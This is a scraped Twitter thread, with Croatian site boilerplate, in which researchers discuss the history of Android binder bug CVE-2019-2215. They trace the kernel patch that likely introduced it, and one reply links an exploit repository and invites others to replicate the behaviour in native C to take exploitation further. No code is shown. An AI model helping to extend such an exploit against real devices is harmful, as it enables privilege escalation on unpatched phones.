I wonder how long CVE-2019-2215 has been exploitable. Trying to read through the kernel sources to figure out if there was a specific date. I notice that earlier kernels called `binder_free_thread` instead of `binder_thread_release`. https://lore.kernel.org/patchwork/patch/805046/ …
That patch set did a major refactor of binder from a single global lock to incorporate more fine-grained locking (performance reasons). It's possible that binder was free from most cross-thread races before this and the epoll race window was missed during the refactor
-
-
Check out https://github.com/marcinguy/CVE-2019-2215/blob/master/README.md#update-1 … (Kernel 3.4.0) If you know how to replicate this using C (native) this can be brought further, since this is the behavior needed for exploitation.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.